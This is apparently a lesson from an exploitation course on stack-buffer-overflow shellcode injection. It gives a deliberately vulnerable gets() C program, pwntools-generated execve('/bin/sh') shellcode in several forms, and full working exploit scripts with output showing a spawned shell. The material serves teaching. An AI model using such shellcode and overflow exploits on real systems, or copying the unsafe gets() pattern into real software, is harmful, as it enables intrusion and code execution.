Definition
We've seen in the previous part that we can redirect the normal execution flow to other functions
already present in the binary.
But in real binaries, there should not be a win() function that you can exploit.
So what if we want to execute our own code ?
This is what we'll learn in this part, using shellcode.
A shellcode is a small piece of code, consisting of assembly instructions.
It is written in hexadecimal format, with op codes (operation codes), and looks something like this :
\x01\x02\x03\x04\0x05\0x6 ...
What can we do
With a shellcode, anything is possible ! All instructions are supported,
so we could for example open a shell /bin/sh.
Why does it work
Injecting shellcode and executing it works because of the Von Neumann architecture, which does not make any difference between data and instructions.
So anything pointed by the EIP will be executed, even if it comes from user input. As long as it looks just like assembly instructions, it will be executed.
How to use it
So basically, just a sequence of assembly opcodes.
And a basic overview of an exploit using shellcode consists of :
- input the shellcode onto the stack
- overwrite EIP to point to the shellcode
- shellcode is executed
Why use a shellcode
- It's small, and most of the time, a buffer overflow won't allow a lot of space
- You can do anything with it, as long as you can write it
ASLR
ASLR (for Address Space Layout Randomization) is a security technique that randomizes memory mapping when running a binary. It does not directly prevent shellcode execution, but it may make it harder (because of memory randomization). We will discuss that in details later.
For this course, to ease our learning, the address of the vulnerable buffer will always be provided.
But you must know that it is generally enabled, but can be bypassed.
Generating a shellcode
We will learn how to write our own shellcode at some point, but for now, we will use pwntools shellcraft to generate a shellcode.
Please, do not execute shellcodes from the Internet.
As explained, we can do anything with a shellcode, and they can be very dangerous.
Shellcodes from pwntools are safe, and they will be enough.
- Open python in REPL (read execute print loop) mode from bash
➜ ~ python3
Python 3.11.1 (main, Dec 31 2022, 10:23:59) [GCC 12.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>>
- Import pwntools
>>> from pwn import *
- Generate a shellcode for a shell
>>> shellcraft.sh()
" /* execve(path='/bin///sh', argv=['sh'], envp=0) */\n /* push b'/bin///sh\\x00' */\n push 0x68\n push 0x732f2f2f\n push 0x6e69622f\n mov ebx, esp\n /* push argument array ['sh\\x00'] */\n /* push 'sh\\x00\\x00' */\n push 0x1010101\n xor dword ptr [esp], 0x1016972\n xor ecx, ecx\n push ecx /* null terminate */\n push 4\n pop ecx\n add ecx, esp\n push ecx /* 'sh\\x00' */\n mov ecx, esp\n xor edx, edx\n /* call execve() */\n push SYS_execve /* 0xb */\n pop eax\n int 0x80\n"
>>>
- Pretty print the shellcode
>>> print(shellcraft.sh())
/* execve(path='/bin///sh', argv=['sh'], envp=0) */
/* push b'/bin///sh\x00' */
push 0x68
push 0x732f2f2f
push 0x6e69622f
mov ebx, esp
/* push argument array ['sh\x00'] */
/* push 'sh\x00\x00' */
push 0x1010101
xor dword ptr [esp], 0x1016972
xor ecx, ecx
push ecx /* null terminate */
push 4
pop ecx
add ecx, esp
push ecx /* 'sh\x00' */
mov ecx, esp
xor edx, edx
/* call execve() */
push SYS_execve /* 0xb */
pop eax
int 0x80
>>>
So this is a simple shellcode generated by pwntools, and when executed, a shell will open.
- Convert the shellcode to assembly
>>> asm(shellcraft.sh())
b'jhh///sh/bin\x89\xe3h\x01\x01\x01\x01\x814$ri\x01\x011\xc9Qj\x04Y\x01\xe1Q\x89\xe11\xd2j\x0bX\xcd\x80'
>>>
This is the shellcode in a format that can be injected in a payload.
- We can also print the shellcode in a hexadecimal format
>>> print(hexdump(asm(shellcraft.sh())))
00000000 6a 68 68 2f 2f 2f 73 68 2f 62 69 6e 89 e3 68 01 │jhh/│//sh│/bin│··h·│
00000010 01 01 01 81 34 24 72 69 01 01 31 c9 51 6a 04 59 │····│4$ri│··1·│Qj·Y│
00000020 01 e1 51 89 e1 31 d2 6a 0b 58 cd 80 │··Q·│·1·j│·X··│
0000002c
>>>
Guided example
#include <stdio.h>
void pwnme()
{
char buffer[100];
printf("buffer is at %p\n", &buffer);
puts("overflow me");
gets(buffer);
}
int main()
{
pwnme();
return 0;
}
Copy paste the above code into a main.c file.
Then compile it with gcc -m32 -no-pie -z execstack main.c -o main
New stack layout
Just like in ret2win section, we have a buffer that can be overflowed with user input
coming from gets().
However, this time, there is no win() function, no flag to print.
The goal here is to inject our own shellcode, point to it, and execute it.
Finding the padding should be trivial by now, we'll be using another technique to automate that inside the process.
from pwn import *
target = './main'
elf = context.binary = ELF(target)
def find_offset() -> int:
p = process()
p.sendline(cyclic(200))
p.wait()
core = Coredump('./core')
offset = cyclic_find(core.fault_addr)
return offset
padding = find_offset() # should be 112 bytes
However this time, we need to inject our shellcode onto the stack.
So our payload should look like :
[shellcode] + [padding] + [ptr to shellcode]
Finding the address of buffer
This section will demonstrate the purpose of ASLR. ASLR is disabled inside GDB, so the address of the buffer should always be the same when checking inside GDB. However, when we run the binary multiple times, it shows a different one.
➜ ~ ./main
buffer is at 0xffe6372c
overflow me
^C
➜ ~ ./main
buffer is at 0xffc44e4c
overflow me
^C
➜ ~ ./main
buffer is at 0xffc0a1fc
overflow me
^C
- Open the binary in gdb
gdb main
- Put a breakpoint on the
gets()call (find the offset yourself, you should know now)
pwndbg> b *pwnme + 65
- Run the binary
pwndbg> r
- Get the address of the buffer
► 0x80491c3 <pwnme+65> call gets@plt <gets@plt>
arg[0]: 0xffffd5cc ◂— 0xd /* '\r' */
arg[1]: 0xffffd5cc ◂— 0xd /* '\r' */
arg[2]: 0xf7fca410 —▸ 0x80482b9 ◂— 'GLIBC_2.0'
arg[3]: 0x804918e (pwnme+12) ◂— add ebx, 0x2e72
What is the address of the buffer ?
Hint
Answer
0xffffd5ccWriting the exploit
In python:
from pwn import *
target = './main'
elf = context.binary = ELF(target)
padding = 112
shellcode = asm(shellcraft.sh())
payload = shellcode # [shellcode]
payload += b'A' * (padding - len(shellcode)) # [padding]
payload += p32(0xffffd5cc) # [ptr to shellcode]
p = process()
print(p.clean())
p.sendline(payload)
p.interactive() # to interact with the shell
Run it :
➜ ~ python3 exploit.py
[*] '/root/main'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX unknown - GNU_STACK missing
PIE: No PIE (0x8048000)
Stack: Executable
RWX: Has RWX segments
[+] Starting local process '/root/main': pid 1474
[*] Process '/root/main' stopped with exit code -11 (SIGSEGV) (pid 1474)
[+] Parsing corefile...: Done
[*] '/root/core'
Arch: i386-32-little
EIP: 0x62616164
ESP: 0xffa80cb0
Exe: '/root/main' (0x8048000)
Fault: 0x62616164
[+] Starting local process '/root/main': pid 1484
b'buffer is at 0xff9e36cc\noverflow me\n' # <---- buffer is at 0xff9e36cc
[*] Switching to interactive mode
[*] Got EOF while reading in interactive
$
[*] Process '/root/main' stopped with exit code -11 (SIGSEGV) (pid 1484)
It failed, obviously because our address found inside GDB is different from the real address of the buffer.
We can just retrieve that address programmatically by adding a few lines inside our exploit :
from pwn import *
target = './main'
elf = context.binary = ELF(target)
def find_offset() -> int:
p = process()
p.sendline(cyclic(200))
p.wait()
core = Coredump('./core')
offset = cyclic_find(core.fault_addr)
return offset
padding = find_offset() # should be 112 bytes
shellcode = asm(shellcraft.sh())
p = process()
p.recvuntil('at ') # we discard output 'buffer is at '
leaked_address = p.recvline()[:-1] # we receive the rest of the output, which is the address, and we remove the last part '\n'
address = int(leaked_address, 0) # we convert the string address into an int, which can be used by p32()
payload = shellcode
payload += b'A' * (padding - len(shellcode))
payload += p32(address)
print(p.clean())
p.sendline(payload)
p.interactive()
➜ ~ python3 exploit.py
[*] '/root/main'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX unknown - GNU_STACK missing
PIE: No PIE (0x8048000)
Stack: Executable
RWX: Has RWX segments
[+] Starting local process '/root/main': pid 1503
[*] Process '/root/main' stopped with exit code -11 (SIGSEGV) (pid 1503)
[+] Parsing corefile...: Done
[*] '/root/core'
Arch: i386-32-little
EIP: 0x62616164
ESP: 0xffb881d0
Exe: '/root/main' (0x8048000)
Fault: 0x62616164
[+] Starting local process '/root/main': pid 1513
/root/exploit.py:20: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
p.recvuntil('at ') # we discard output 'buffer is at '
b'overflow me\n'
[*] Switching to interactive mode
$ ls
core exploit.py flag.txt main main.c
Congratz, you popped your first shell 🎉
Troubleshooting
If you have the error "core file not found", it's because you may be running on Ubuntu, and your Coredump file is generated elsewhere. To fix that (just for this course), you need to run the following commands on your host machine (outside of your docker container):
echo core | sudo tee /proc/sys/kernel/core_pattern
echo 0 | sudo tee /proc/sys/kernel/core_uses_pid